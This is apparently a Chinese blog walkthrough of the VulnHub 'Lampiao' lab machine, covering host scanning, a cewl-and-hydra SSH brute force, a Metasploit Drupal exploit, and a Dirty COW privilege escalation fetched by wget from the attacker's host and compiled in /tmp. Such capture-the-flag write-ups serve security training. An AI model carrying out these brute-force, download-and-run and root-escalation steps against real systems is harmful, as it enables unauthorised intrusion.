vulnhub-lampiao通关教程
这里的靶机ip是192.168.135.136 kali IP是192.168.135.131
当然我们事先是不知道靶机IP的要扫描网段存活主机
Nmap -sP 192.168.135.0/24

知道靶机后就扫开放端口
Nmap 192.168.135.136

我们开放ssh,和http,我们先尝试登录他的网址

这里没有什么有用的东西,我们read more查看更多信息

我们发现url中的路径出现数据,且能够更改,我们枚举它
我们从语音中知道了用户名信息tiago
我们继续遍历网址还有什么目录
Dirb http://192.168.135.136:1898


这里我们发现了robots.txt,这个一般都是比较重要的信息泄露,我们登录域名看看发现了许多.txt,这些都是比较重要的


我们知道了它使用的是Drupal 7.54,此外就没什么了,我们可以试着爆破tiago,用户名试试,就用网站的信息作密码爆破
Cewl http://192.168.135.136:1898/ -w yang.txt

我们尝试用九头蛇来打工试试能不能出密码
Hydra -l tiago -P yang.txt 192.168.135.136 ssh
这里我就不解释参数了,tiago是我们要爆破的账号,yang.txt是我们爬虫爬取的密码本,136是我们的目标机(靶机)ssh是协议,目标开放了http和ssh


这里我们爆出了密码Virgulino,我们直接登录他的ssh看看有什么宝贝在里面


我们发现他是低权限,搜索有没有exp能使用啊,这也是一条路

我们发现能够用cve-2018那个来获取msf,那我们尝试一下
Search drupal

我们查看需要设置的参数直接run/exploit,看看能不能创建会话啊
成功创建会话,shell进入会话,发现是尾shell,我们进入交互shell
Shell
Python -c ‘import pty;pty.spawn(“/bin/bash”)’ 这个就是来获取交互的

这里先用unam -a查看版本,看看kali里有没有能用的
Searchsploit dirty

我们看看他在靶机上的路径,方便我们放到桌面
Searchsploit 40847.cpp
Searchsploit -p 40847.cpp

将他丢到桌面并赋权,我习惯777,你也可以+x或者u+x,我常用的

我们开启本地服务,让目标机可以下载我们kali上的文件,记着文件在哪里,就在哪里开服务
Python -m http.server 8000 这里还有好的命令的,但这个简单好记喔

我们进入tmp,这里可以读写执行上传编译,完事自动清理,很ok\
先cd /tmp ,后面我不会再解释了,也不会再敲出这个命令了
Cd /tmp
Wget http://192.168.135.131:8000/40847.cpp

这里改不改都无所谓啊,我习惯了,多敲一遍chmod也没事,这里我又敲了一遍哈哈
Chmod 777 40847.cpp

接下来就是要进行编译了,说真的你要通关可以看我的帖子,但是编译这个东西我也说不明白,我也看不出,小菜鸡一个我直接给命令直接编译
命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dayu 40847.cpp -lutil

这里我们直接执行编译后的exp就能获得root密码

这里我一直没有得到密码,我以为是我编译成yang再执行就不行,结果我打开靶机是靶机崩了,我在重新下载exp,编译,执行结果成功了

编译完后就能获得root的密码了,我们ssh登录root就能获得flag了
Ssh root@192.168.135.136

登录成功,查看flag
Ls
Cat flag.txt

这里我分享一下我得到的思路,如有不对可不理睬
先扫描存活网段得到目标机ip,扫开放端口制定思路,有时也可全扫看看详细内容,后面会有ftp默认登录要全扫才能看到,不然亏大。
我们先登录http看看有没有获得什么有用的信息让我们可以登录ssh,这里可以使用dirb,扫目录,也可一个一个枚举,也可以cewl爬取信息直接hydra快一点,但是会漏些东西。
我们登录ssh后看看里面有什么东西,有时能获得些有用的东西。
这时我们可以试着拿我们获得的版本查看有无exp可用,或者直接msf得shell.
最后就是提权了,我们查看版本,靶机一般都有exp可以用,我们下载到kali后再拉取到系统,编译后一般都可以提权或获得敏感信息获得flag。
这里最重要的是获得交互shell了,毕竟大多命令都是记不住的可以豆包,但是交互shell记住了总是对的要多敲
Python -c ‘import pty;pty.spawn(“/bin/bash”)’
Python -c ‘import pty;pty.spawn(“/bin/bash”)’
Python -c ‘import pty;pty.spawn(“/bin/bash”)’
浙公网安备 33010602011771号